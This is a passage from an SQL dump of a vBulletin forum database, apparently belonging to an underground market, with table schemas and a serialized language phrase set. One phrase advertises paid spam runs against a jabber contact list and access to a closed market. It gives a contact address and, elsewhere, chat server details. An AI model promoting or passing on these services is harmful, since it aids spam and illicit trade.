`state` enum('visible','moderation','deleted') NOT NULL DEFAULT 'visible',
`title` varchar(255) NOT NULL DEFAULT '',
`pagetext` mediumtext,
`ipaddress` int(10) unsigned NOT NULL DEFAULT '0',
`allowsmilie` smallint(5) unsigned NOT NULL DEFAULT '0',
`reportthreadid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`gmid`),
KEY `postuserid` (`postuserid`,`discussionid`,`state`),
KEY `discussionid` (`discussionid`,`dateline`,`state`),
FULLTEXT KEY `gm_ft` (`title`,`pagetext`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `groupmessage_hash`;
CREATE TABLE `groupmessage_hash` (
`postuserid` int(10) unsigned NOT NULL DEFAULT '0',
`groupid` int(10) unsigned NOT NULL DEFAULT '0',
`dupehash` varchar(32) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
KEY `postuserid` (`postuserid`,`dupehash`),
KEY `dateline` (`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `groupread`;
CREATE TABLE `groupread` (
`userid` int(10) unsigned NOT NULL,
`groupid` int(10) unsigned NOT NULL,
`readtime` int(10) unsigned NOT NULL,
PRIMARY KEY (`userid`,`groupid`),
KEY `readtime` (`readtime`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `holiday`;
CREATE TABLE `holiday` (
`holidayid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`varname` varchar(100) NOT NULL DEFAULT '',
`recurring` smallint(5) unsigned NOT NULL DEFAULT '0',
`recuroption` char(6) NOT NULL DEFAULT '',
`allowsmilies` smallint(6) NOT NULL DEFAULT '1',
PRIMARY KEY (`holidayid`),
KEY `varname` (`varname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `humanverify`;
CREATE TABLE `humanverify` (
`hash` char(32) NOT NULL DEFAULT '',
`answer` mediumtext,
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`viewed` smallint(5) unsigned NOT NULL DEFAULT '0',
KEY `hash` (`hash`),
KEY `dateline` (`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `hvanswer`;
CREATE TABLE `hvanswer` (
`answerid` int(11) NOT NULL AUTO_INCREMENT,
`questionid` int(11) NOT NULL DEFAULT '0',
`answer` varchar(255) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`answerid`),
KEY `questionid` (`questionid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `hvquestion`;
CREATE TABLE `hvquestion` (
`questionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`regex` varchar(255) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`questionid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `icon`;
CREATE TABLE `icon` (
`iconid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(100) NOT NULL DEFAULT '',
`iconpath` varchar(100) NOT NULL DEFAULT '',
`imagecategoryid` smallint(5) unsigned NOT NULL DEFAULT '0',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '1',
PRIMARY KEY (`iconid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `icon` (`iconid`, `title`, `iconpath`, `imagecategoryid`, `displayorder`) VALUES
(1, 'Post', 'images/icons/icon1.gif', 2, 1),
(2, 'Arrow', 'images/icons/icon2.gif', 2, 1),
(3, 'Lightbulb', 'images/icons/icon3.gif', 2, 1),
(4, 'Exclamation', 'images/icons/icon4.gif', 2, 1),
(5, 'Question', 'images/icons/icon5.gif', 2, 1),
(6, 'Cool', 'images/icons/icon6.gif', 2, 1),
(7, 'Smile', 'images/icons/icon7.gif', 2, 1),
(8, 'Angry', 'images/icons/icon8.gif', 2, 1),
(9, 'Unhappy', 'images/icons/icon9.gif', 2, 1),
(10, 'Talking', 'images/icons/icon10.gif', 2, 1),
(11, 'Red face', 'images/icons/icon11.gif', 2, 1),
(12, 'Wink', 'images/icons/icon12.gif', 2, 1),
(13, 'Thumbs down', 'images/icons/icon13.gif', 2, 1),
(14, 'Thumbs up', 'images/icons/icon14.gif', 2, 1);
DROP TABLE IF EXISTS `imagecategory`;
CREATE TABLE `imagecategory` (
`imagecategoryid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL DEFAULT '',
`imagetype` smallint(5) unsigned NOT NULL DEFAULT '0',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`imagecategoryid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `imagecategory` (`imagecategoryid`, `title`, `imagetype`, `displayorder`) VALUES
(1, 'Generic Smilies', 3, 1),
(2, 'Generic Icons', 2, 1),
(3, 'Generic Avatars', 1, 1);
DROP TABLE IF EXISTS `imagecategorypermission`;
CREATE TABLE `imagecategorypermission` (
`imagecategoryid` smallint(5) unsigned NOT NULL DEFAULT '0',
`usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
KEY `imagecategoryid` (`imagecategoryid`,`usergroupid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `infraction`;
CREATE TABLE `infraction` (
`infractionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`infractionlevelid` int(10) unsigned NOT NULL DEFAULT '0',
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`whoadded` int(10) unsigned NOT NULL DEFAULT '0',
`points` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`note` varchar(255) NOT NULL DEFAULT '',
`action` smallint(5) unsigned NOT NULL DEFAULT '0',
`actiondateline` int(10) unsigned NOT NULL DEFAULT '0',
`actionuserid` int(10) unsigned NOT NULL DEFAULT '0',
`actionreason` varchar(255) NOT NULL DEFAULT '0',
`expires` int(10) unsigned NOT NULL DEFAULT '0',
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`customreason` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`infractionid`),
KEY `expires` (`expires`,`action`),
KEY `userid` (`userid`,`action`),
KEY `infractonlevelid` (`infractionlevelid`),
KEY `postid` (`postid`),
KEY `threadid` (`threadid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `infractionban`;
CREATE TABLE `infractionban` (
`infractionbanid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`usergroupid` int(11) NOT NULL DEFAULT '0',
`banusergroupid` int(10) unsigned NOT NULL DEFAULT '0',
`amount` int(10) unsigned NOT NULL DEFAULT '0',
`period` char(5) NOT NULL DEFAULT '',
`method` enum('points','infractions') NOT NULL DEFAULT 'infractions',
PRIMARY KEY (`infractionbanid`),
KEY `usergroupid` (`usergroupid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `infractiongroup`;
CREATE TABLE `infractiongroup` (
`infractiongroupid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`usergroupid` int(11) NOT NULL DEFAULT '0',
`orusergroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
`pointlevel` int(10) unsigned NOT NULL DEFAULT '0',
`override` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`infractiongroupid`),
KEY `usergroupid` (`usergroupid`,`pointlevel`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `infractionlevel`;
CREATE TABLE `infractionlevel` (
`infractionlevelid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`points` int(10) unsigned NOT NULL DEFAULT '0',
`expires` int(10) unsigned NOT NULL DEFAULT '0',
`period` enum('H','D','M','N') NOT NULL DEFAULT 'H',
`warning` smallint(5) unsigned NOT NULL DEFAULT '0',
`extend` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`infractionlevelid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `infractionlevel` (`infractionlevelid`, `points`, `expires`, `period`, `warning`, `extend`) VALUES
(1, 1, 10, 'D', 1, 0),
(2, 1, 10, 'D', 1, 0),
(3, 1, 10, 'D', 1, 0),
(4, 1, 10, 'D', 1, 0);
DROP TABLE IF EXISTS `language`;
CREATE TABLE `language` (
`languageid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(50) NOT NULL DEFAULT '',
`userselect` smallint(5) unsigned NOT NULL DEFAULT '1',
`options` smallint(5) unsigned NOT NULL DEFAULT '1',
`languagecode` varchar(12) NOT NULL DEFAULT '',
`charset` varchar(15) NOT NULL DEFAULT '',
`imagesoverride` varchar(150) NOT NULL DEFAULT '',
`dateoverride` varchar(50) NOT NULL DEFAULT '',
`timeoverride` varchar(50) NOT NULL DEFAULT '',
`registereddateoverride` varchar(50) NOT NULL DEFAULT '',
`calformat1override` varchar(50) NOT NULL DEFAULT '',
`calformat2override` varchar(50) NOT NULL DEFAULT '',
`logdateoverride` varchar(50) NOT NULL DEFAULT '',
`locale` varchar(20) NOT NULL DEFAULT '',
`decimalsep` char(1) NOT NULL DEFAULT '.',
`thousandsep` char(1) NOT NULL DEFAULT ',',
`phrasegroup_global` mediumtext,
`phrasegroup_cpglobal` mediumtext,
`phrasegroup_cppermission` mediumtext,
`phrasegroup_forum` mediumtext,
`phrasegroup_calendar` mediumtext,
`phrasegroup_attachment_image` mediumtext,
`phrasegroup_style` mediumtext,
`phrasegroup_logging` mediumtext,
`phrasegroup_cphome` mediumtext,
`phrasegroup_promotion` mediumtext,
`phrasegroup_user` mediumtext,
`phrasegroup_help_faq` mediumtext,
`phrasegroup_sql` mediumtext,
`phrasegroup_subscription` mediumtext,
`phrasegroup_language` mediumtext,
`phrasegroup_bbcode` mediumtext,
`phrasegroup_stats` mediumtext,
`phrasegroup_diagnostic` mediumtext,
`phrasegroup_maintenance` mediumtext,
`phrasegroup_profilefield` mediumtext,
`phrasegroup_thread` mediumtext,
`phrasegroup_timezone` mediumtext,
`phrasegroup_banning` mediumtext,
`phrasegroup_reputation` mediumtext,
`phrasegroup_wol` mediumtext,
`phrasegroup_threadmanage` mediumtext,
`phrasegroup_pm` mediumtext,
`phrasegroup_cpuser` mediumtext,
`phrasegroup_accessmask` mediumtext,
`phrasegroup_cron` mediumtext,
`phrasegroup_moderator` mediumtext,
`phrasegroup_cpoption` mediumtext,
`phrasegroup_cprank` mediumtext,
`phrasegroup_cpusergroup` mediumtext,
`phrasegroup_holiday` mediumtext,
`phrasegroup_posting` mediumtext,
`phrasegroup_poll` mediumtext,
`phrasegroup_fronthelp` mediumtext,
`phrasegroup_register` mediumtext,
`phrasegroup_search` mediumtext,
`phrasegroup_showthread` mediumtext,
`phrasegroup_postbit` mediumtext,
`phrasegroup_forumdisplay` mediumtext,
`phrasegroup_messaging` mediumtext,
`phrasegroup_inlinemod` mediumtext,
`phrasegroup_plugins` mediumtext,
`phrasegroup_cprofilefield` mediumtext,
`phrasegroup_reputationlevel` mediumtext,
`phrasegroup_infraction` mediumtext,
`phrasegroup_infractionlevel` mediumtext,
`phrasegroup_notice` mediumtext,
`phrasegroup_prefix` mediumtext,
`phrasegroup_prefixadmin` mediumtext,
`phrasegroup_album` mediumtext,
`phrasegroup_socialgroups` mediumtext,
PRIMARY KEY (`languageid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
INSERT INTO `language` (`languageid`, `title`, `userselect`, `options`, `languagecode`, `charset`, `imagesoverride`, `dateoverride`, `timeoverride`, `registereddateoverride`, `calformat1override`, `calformat2override`, `logdateoverride`, `locale`, `decimalsep`, `thousandsep`, `phrasegroup_global`, `phrasegroup_cpglobal`, `phrasegroup_cppermission`, `phrasegroup_forum`, `phrasegroup_calendar`, `phrasegroup_attachment_image`, `phrasegroup_style`, `phrasegroup_logging`, `phrasegroup_cphome`, `phrasegroup_promotion`, `phrasegroup_user`, `phrasegroup_help_faq`, `phrasegroup_sql`, `phrasegroup_subscription`, `phrasegroup_language`, `phrasegroup_bbcode`, `phrasegroup_stats`, `phrasegroup_diagnostic`, `phrasegroup_maintenance`, `phrasegroup_profilefield`, `phrasegroup_thread`, `phrasegroup_timezone`, `phrasegroup_banning`, `phrasegroup_reputation`, `phrasegroup_wol`, `phrasegroup_threadmanage`, `phrasegroup_pm`, `phrasegroup_cpuser`, `phrasegroup_accessmask`, `phrasegroup_cron`, `phrasegroup_moderator`, `phrasegroup_cpoption`, `phrasegroup_cprank`, `phrasegroup_cpusergroup`, `phrasegroup_holiday`, `phrasegroup_posting`, `phrasegroup_poll`, `phrasegroup_fronthelp`, `phrasegroup_register`, `phrasegroup_search`, `phrasegroup_showthread`, `phrasegroup_postbit`, `phrasegroup_forumdisplay`, `phrasegroup_messaging`, `phrasegroup_inlinemod`, `phrasegroup_plugins`, `phrasegroup_cprofilefield`, `phrasegroup_reputationlevel`, `phrasegroup_infraction`, `phrasegroup_infractionlevel`, `phrasegroup_notice`, `phrasegroup_prefix`, `phrasegroup_prefixadmin`, `phrasegroup_album`, `phrasegroup_socialgroups`) VALUES
(1, 'English (US)', 1, 1, 'en', 'ISO-8859-1', '', '', '', '', '', '', '', '', '.', ',', 'a:570:{s:9:\"1_day_ago\";s:9:\"1 Day Ago\";s:10:\"1_hour_ago\";s:10:\"1 Hour Ago\";s:12:\"1_minute_ago\";s:12:\"1 Minute Ago\";s:10:\"1_week_ago\";s:10:\"1 Week Ago\";s:14:\"a_closed_forum\";s:14:\"A Closed Forum\";s:6:\"accept\";s:6:\"Accept\";s:6:\"action\";s:6:\"Action\";s:14:\"active_members\";s:14:\"Active Members\";s:20:\"active_subscriptions\";s:20:\"Active Subscriptions\";s:15:\"add_new_folders\";s:15:\"Add New Folders\";s:16:\"add_subscription\";s:16:\"Add Subscription\";s:17:\"add_x_to_contacts\";s:25:\"Add %1$s to Your Contacts\";s:5:\"admin\";s:5:\"Admin\";s:19:\"admin_control_panel\";s:19:\"Admin Control Panel\";s:23:\"admin_required_register\";s:116:\"The administrator may have required you to register before you can view this page.\";s:29:\"administrator_decided_x_quiet\";s:85:\"The administrator has decided that %1$s should be quiet for a while.\";s:34:\"administrator_may_disabled_account\";s:110:\"If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.\";s:15:\"advanced_search\";s:15:\"Advanced Search\";s:3:\"age\";s:3:\"Age\";s:15:\"alert_board_off\";s:50:\"Alert: The forums are currently turned off!\";s:10:\"all_forums\";s:10:\"All Forums\";s:33:\"all_times_are_gmt_x_time_now_is_y\";s:70:\"All times are GMT%1$s. The time now is %2$s .\";s:12:\"allow_bbcode\";s:13:\"Allow BB Code\";s:10:\"allow_html\";s:10:\"Allow HTML\";s:14:\"allow_img_code\";s:16:\"Allow [IMG] Code\";s:13:\"allow_smilies\";s:13:\"Allow Smilies\";s:12:\"announcement\";s:12:\"Announcement\";s:13:\"announcements\";s:13:\"Announcements\";s:22:\"announcements_in_forum\";s:22:\"Announcements in Forum\";s:5:\"april\";s:5:\"April\";s:7:\"archive\";s:7:\"Archive\";s:10:\"attachment\";s:10:\"Attachment\";s:21:\"attachment_statistics\";s:21:\"Attachment Statistics\";s:11:\"attachments\";s:11:\"Attachments\";s:6:\"august\";s:6:\"August\";s:12:\"bb_code_is_x\";s:67:\"BB code is %2$s \";s:14:\"bbcode_allowed\";s:42:\"BB Code Allowed \";s:18:\"bbcode_not_allowed\";s:22:\"BB Code is not allowed\";s:10:\"befriend_x\";s:13:\"Befriend %1$s\";s:4:\"by_x\";s:41:\"by %2$s \";s:5:\"bytes\";s:5:\"Bytes\";s:8:\"calendar\";s:8:\"Calendar\";s:28:\"can_moderate_user_signatures\";s:28:\"Can Moderate User Signatures\";s:6:\"cancel\";s:6:\"Cancel\";s:14:\"cancel_changes\";s:14:\"Cancel Changes\";s:19:\"cant_identify_image\";s:52:\"Can\'t identify the image? Click it to get a new one.\";s:15:\"caps_lock_is_on\";s:191:\"Caps Lock is on! \r\n \r\nHaving Caps Lock on may cause you to enter your password incorrectly. You should press Caps Lock to turn it off before entering your password.\";s:17:\"check_uncheck_all\";s:19:\"Check / Uncheck All\";s:26:\"check_vulnerable_passwords\";s:26:\"Check Vulnerable Passwords\";s:45:\"click_a_smilie_to_insert_it_into_your_message\";s:46:\"Click a smilie to insert it into your message.\";s:20:\"click_here_to_log_in\";s:20:\"Click here to log in\";s:34:\"click_if_browser_does_not_redirect\";s:63:\"Click here if your browser does not automatically redirect you.\";s:26:\"click_the_following_button\";s:38:\"Click the following button to proceed.\";s:17:\"close_this_window\";s:17:\"Close this window\";s:13:\"closed_thread\";s:13:\"Closed Thread\";s:4:\"code\";s:4:\"Code\";s:9:\"community\";s:9:\"Community\";s:15:\"community_links\";s:15:\"Community Links\";s:7:\"contact\";s:7:\"Contact\";s:10:\"contact_us\";s:10:\"Contact Us\";s:8:\"contacts\";s:8:\"Contacts\";s:20:\"contacts_and_friends\";s:22:\"Contacts & Friends\";s:18:\"contains_new_posts\";s:18:\"Contains New Posts\";s:21:\"contains_no_new_posts\";s:21:\"Contains No New Posts\";s:26:\"current_attachment_total_x\";s:30:\"Current Attachment Total: %1$s\";s:19:\"current_attachments\";s:19:\"Current Attachments\";s:22:\"currently_active_users\";s:22:\"Currently Active Users\";s:13:\"custom_fields\";s:13:\"Custom Fields\";s:5:\"daily\";s:5:\"Daily\";s:24:\"daily_email_notification\";s:24:\"Daily email notification\";s:22:\"daily_updates_by_email\";s:22:\"Daily updates by email\";s:4:\"date\";s:4:\"Date\";s:3:\"day\";s:3:\"Day\";s:4:\"days\";s:4:\"Days\";s:8:\"december\";s:8:\"December\";s:13:\"decrease_size\";s:13:\"Decrease Size\";s:7:\"default\";s:7:\"Default\";s:6:\"delete\";s:6:\"Delete\";s:12:\"delete_posts\";s:12:\"Delete Posts\";s:15:\"delete_selected\";s:15:\"Delete Selected\";s:19:\"delete_subscription\";s:19:\"Delete Subscription\";s:13:\"delete_thread\";s:13:\"Delete Thread\";s:16:\"delete_user_note\";s:16:\"Delete User Note\";s:4:\"deny\";s:4:\"Deny\";s:17:\"destination_forum\";s:17:\"Destination Forum\";s:8:\"disabled\";s:8:\"Disabled\";s:31:\"discussion_by_x_for_y_undeleted\";s:39:\"Discussion by %1$s for \'%2$s\' Undeleted\";s:29:\"discussion_thread_created_x_y\";s:66:\"A discussion thread has been created at %1$s/showthread.php?t=%2$s\";s:7:\"dismiss\";s:7:\"Dismiss\";s:15:\"display_options\";s:15:\"Display Options\";s:17:\"do_authorizations\";s:17:\"Do Authorizations\";s:4:\"done\";s:4:\"Done\";s:26:\"doubleclick_forum_markread\";s:66:\"Double-click this icon to mark this forum and its contents as read\";s:4:\"edit\";s:4:\"Edit\";s:11:\"edit_avatar\";s:11:\"Edit Avatar\";s:12:\"edit_folders\";s:12:\"Edit Folders\";s:12:\"edit_options\";s:12:\"Edit Options\";s:16:\"edit_permissions\";s:16:\"Edit Permissions\";s:9:\"edit_poll\";s:9:\"Edit Poll\";s:9:\"edit_post\";s:9:\"Edit Post\";s:20:\"edit_profile_picture\";s:20:\"Edit Profile Picture\";s:14:\"edit_signature\";s:14:\"Edit Signature\";s:11:\"edit_thread\";s:11:\"Edit Thread\";s:14:\"edit_user_note\";s:14:\"Edit User Note\";s:17:\"edit_your_details\";s:17:\"Edit Your Details\";s:5:\"email\";s:5:\"Email\";s:13:\"email_address\";s:13:\"Email Address\";s:8:\"emailing\";s:8:\"Emailing\";s:8:\"end_date\";s:8:\"End Date\";s:26:\"enter_password_for_account\";s:86:\"Please enter a password for your user account. Note that passwords are case-sensitive.\";s:35:\"enter_username_to_login_or_register\";s:129:\"Enter your username and password in the boxes provided to login, or click the \'register\' button to create a profile for yourself.\";s:6:\"errors\";s:6:\"Errors\";s:29:\"errors_occured_when_submitted\";s:50:\"The following errors occurred with your submission\";s:5:\"event\";s:5:\"Event\";s:15:\"event_reminders\";s:15:\"Event Reminders\";s:6:\"export\";s:6:\"Export\";s:3:\"faq\";s:3:\"FAQ\";s:8:\"february\";s:8:\"February\";s:19:\"find_all_posts_by_x\";s:22:\"Find all posts by %1$s\";s:18:\"find_posts_by_user\";s:18:\"Find Posts by User\";s:5:\"first\";s:5:\"First\";s:10:\"first_page\";s:10:\"First Page\";s:19:\"first_picture_short\";s:5:\"First\";s:19:\"first_visit_message\";s:515:\"The procedure for placing ads : \r\n \r\n * One-time ad placement: $ 10 \r\n\r\n * One-time ad placement + retweet: $ 30 \r\n\r\n * One-time ad placement + retweet + spamming jabber contact list (over 1000 customers): $ 50 \r\n \r\n * Seller account: advertising + retweet spamming jabber contact list fo + Access to the closed part of the Market: $ 200/month \r\n \r\n * Account with access to the closed part of the Market: $ 100 \r\n\r\n admin@w0rm.ws \";s:6:\"folder\";s:6:\"Folder\";s:15:\"folder_controls\";s:15:\"Folder Controls\";s:25:\"folder_is_currently_empty\";s:31:\"This folder is currently empty.\";s:11:\"folder_name\";s:11:\"Folder Name\";s:7:\"folders\";s:7:\"Folders\";s:32:\"forgotten_password_request_email\";s:238:\"If you have forgotten your username or password, you can request to have your username emailed to you and to reset your password. When you fill in your registered email address, you will be sent instructions on how to reset your password.\";s:23:\"forgotten_your_password\";s:24:\"Forgotten Your Password?\";s:5:\"forum\";s:5:\"Forum\";s:24:\"forum_contains_new_posts\";s:24:\"Forum Contains New Posts\";s:27:\"forum_contains_no_new_posts\";s:27:\"Forum Contains No New Posts\";s:27:\"forum_is_closed_for_posting\";s:27:\"Forum is Closed for Posting\";s:10:\"forum_jump\";s:10:\"Forum Jump\";s:16:\"forum_rules_link\";s:46:\"Forum Rules \";s:6:\"forums\";s:6:\"Forums\";s:11:\"forums_home\";s:11:\"Forums Home\";s:6:\"friday\";s:6:\"Friday\";s:6:\"friend\";s:6:\"Friend\";s:9:\"gigabytes\";s:2:\"GB\";s:19:\"global_announcement\";s:19:\"Global Announcement\";s:2:\"go\";s:2:\"Go\";s:7:\"go_back\";s:7:\"Go Back\";s:27:\"go_first_unread_in_thread_x\";s:40:\"Go to first unread post in thread \'%1$s\'\";s:20:\"go_to_first_new_post\";s:20:\"Go to first new post\";s:15:\"go_to_last_post\";s:15:\"Go to last post\";s:10:\"go_to_page\";s:13:\"Go to Page...\";s:4:\"go_x\";s:9:\"Go (%1$s)\";s:32:\"group_messages_awaiting_approval\";s:25:\"Unapproved Group Messages\";s:5:\"guest\";s:5:\"Guest\";s:21:\"have_new_pm_popup_x_y\";s:117:\"You have a new private message.\\n\\nSender: %1$s\\nTitle: \'%2$s\'\\n\\nClick OK to view it, or cancel to hide this prompt.\";s:29:\"have_x_posts_in_thread_last_y\";s:47:\"You have %1$s post(s) in this thread, last %2$s\";s:15:\"hide_thumbnails\";s:15:\"Hide Thumbnails\";s:5:\"hours\";s:5:\"Hours\";s:9:\"html_code\";s:9:\"HTML Code\";s:14:\"html_code_is_x\";s:34:\"HTML code is %1$s \";s:6:\"hybrid\";s:6:\"Hybrid\";s:6:\"ignore\";s:6:\"Ignore\";s:18:\"image_verification\";s:18:\"Image Verification\";s:13:\"img_code_is_x\";s:70:\"[IMG] code is %2$s \";s:11:\"in_progress\";s:11:\"In Progress\";s:5:\"inbox\";s:5:\"Inbox\";s:24:\"incoming_friend_requests\";s:24:\"Incoming Friend Requests\";s:13:\"increase_size\";s:13:\"Increase Size\";s:4:\"info\";s:4:\"Info\";s:11:\"infractions\";s:11:\"Infractions\";s:26:\"instant_email_notification\";s:26:\"Instant email notification\";s:17:\"instant_messaging\";s:17:\"Instant Messaging\";s:29:\"instant_notification_by_email\";s:29:\"Instant notification by email\";s:10:\"invisible1\";s:12:\"is Invisible\";s:33:\"invitations_to_join_social_groups\";s:24:\"Social Group Invitations\";s:10:\"ip_address\";s:10:\"IP Address\";s:7:\"january\";s:7:\"January\";s:9:\"join_date\";s:9:\"Join Date\";s:12:\"join_request\";s:12:\"Join Request\";s:13:\"join_requests\";s:13:\"Join Requests\";s:4:\"july\";s:4:\"July\";s:14:\"jump_to_folder\";s:14:\"Jump to Folder\";s:4:\"june\";s:4:\"June\";s:9:\"kilobytes\";s:2:\"KB\";s:4:\"last\";s:4:\"Last\";s:13:\"last_activity\";s:13:\"Last Activity\";s:11:\"last_online\";s:11:\"Last Online\";s:9:\"last_page\";s:9:\"Last Page\";s:18:\"last_picture_short\";s:4:\"Last\";s:9:\"last_post\";s:9:\"Last Post\";s:19:\"last_visited_x_at_y\";s:56:\"You last visited: %1$s at %2$s \";s:14:\"lightbox_first\";s:5:\"First\";s:13:\"lightbox_last\";s:4:\"Last\";s:13:\"lightbox_next\";s:4:\"Next\";s:17:\"lightbox_previous\";s:8:\"Previous\";s:13:\"list_messages\";s:13:\"List Messages\";s:18:\"list_subscriptions\";s:18:\"List Subscriptions\";s:13:\"location_perm\";s:8:\"Location\";s:6:\"log_in\";s:6:\"Log in\";s:7:\"log_out\";s:7:\"Log Out\";s:9:\"log_out_x\";s:12:\"Log Out %1$s\";s:14:\"logged_in_as_x\";s:52:\"Logged in as %2$s \";s:27:\"lost_password_recovery_form\";s:27:\"Lost Password Recovery Form\";s:6:\"manage\";s:6:\"Manage\";s:18:\"manage_attachments\";s:18:\"Manage Attachments\";s:5:\"march\";s:5:\"March\";s:16:\"mark_forums_read\";s:16:\"Mark Forums Read\";s:25:\"mark_this_discussion_read\";s:25:\"Mark This Discussion Read\";s:20:\"mark_this_group_read\";s:20:\"Mark This Group Read\";s:26:\"maximum_allowed_messages_x\";s:37:\"Maximum allowed stored messages: %1$s\";s:28:\"maximum_attachment_storage_x\";s:32:\"Maximum Attachment Storage: %1$s\";s:3:\"may\";s:3:\"May\";s:27:\"may_choose_icon_for_message\";s:63:\"You may choose an icon for your message from the following list\";s:34:\"may_not_have_sufficient_privileges\";s:167:\"You may not have sufficient privileges to access this page. Are you trying to edit someone else\'s post, access administrative features or some other privileged system?\";s:9:\"megabytes\";s:2:\"MB\";s:7:\"members\";s:7:\"Members\";s:12:\"members_list\";s:12:\"Members List\";s:22:\"members_picture_albums\";s:23:\"Member\'s Picture Albums\";s:7:\"message\";s:7:\"Message\";s:20:\"message_deleted_by_x\";s:57:\"This message has been deleted by %2$s .\";s:31:\"message_hidden_x_on_ignore_list\";s:111:\"This message is hidden because %1$s is on your ignore list .\";s:8:\"messages\";s:8:\"Messages\";s:13:\"miscellaneous\";s:13:\"Miscellaneous\";s:21:\"miscellaneous_options\";s:21:\"Miscellaneous Options\";s:3:\"mod\";s:3:\"Mod\";s:9:\"moderator\";s:9:\"Moderator\";s:23:\"moderator_control_panel\";s:23:\"Moderator Control Panel\";s:10:\"moderators\";s:10:\"Moderators\";s:6:\"monday\";s:6:\"Monday\";s:5:\"month\";s:5:\"Month\";s:7:\"monthly\";s:7:\"Monthly\";s:6:\"months\";s:6:\"Months\";s:30:\"more_than_x_replies_or_y_views\";s:36:\"More than %1$s replies or %2$s views\";s:35:\"most_users_ever_online_was_x_y_at_z\";s:46:\"Most users ever online was %1$s, %2$s at %3$s.\";s:25:\"move_delete_subscriptions\";s:27:\"Move / Delete Subscriptions\";s:10:\"move_items\";s:10:\"Move Items\";s:23:\"move_subscribed_threads\";s:23:\"Move Subscribed Threads\";s:14:\"move_to_folder\";s:14:\"Move to folder\";s:19:\"move_x_items_from_y\";s:27:\"Move %1$s items from \'%2$s\'\";s:19:\"moved_thread_prefix\";s:7:\"Moved: \";s:16:\"multipage_thread\";s:17:\"Multi-page thread\";s:20:\"multiple_choice_poll\";s:21:\"Multiple Choice Poll.\";s:3:\"n_a\";s:3:\"N/A\";s:18:\"nav_members_search\";s:23:\"Advanced Members Search\";s:13:\"nav_new_posts\";s:14:\"Find New Posts\";s:18:\"nav_search_options\";s:20:\"Other Search Options\";s:16:\"nav_todays_posts\";s:18:\"Find Today\'s Posts\";s:10:\"networking\";s:10:\"Networking\";s:5:\"never\";s:5:\"Never\";s:3:\"new\";s:3:\"Neu\";s:9:\"new_posts\";s:9:\"New posts\";s:13:\"new_posts_nav\";s:9:\"New Posts\";s:13:\"new_user_note\";s:13:\"New User Note\";s:4:\"next\";s:4:\"Next\";s:9:\"next_page\";s:9:\"Next Page\";s:18:\"next_picture_short\";s:4:\"Next\";s:2:\"no\";s:2:\"No\";s:21:\"no_email_notification\";s:21:\"No email notification\";s:7:\"no_icon\";s:7:\"No icon\";s:12:\"no_new_posts\";s:12:\"No new posts\";s:33:\"no_signatures_awaiting_moderation\";s:33:\"No Signatures Awaiting Moderation\";s:17:\"no_users_selected\";s:18:\"No users selected!\";s:4:\"none\";s:4:\"None\";s:3:\"not\";s:3:\"not\";s:26:\"not_logged_in_fill_in_form\";s:81:\"You are not logged in. Fill in the form at the bottom of this page and try again.\";s:24:\"not_logged_no_permission\";s:117:\"You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:\";s:14:\"notice_14_html\";s:472:\"\r\n\r\nTeamspeak³ \r\nServer: 50.7.241.58 \r\nPort: 9987 \r\n \r\nIRC \r\nServer: irc.darkisland.biz:6666 \r\nChannel: #uc \r\n \r\n
\r\n\";s:14:\"notice_15_html\";s:414:\"
Planed Downtime in 1-4 Days ~ \r\n
\r\n \r\nVisit our twitterprofile:\r\n
\r\n
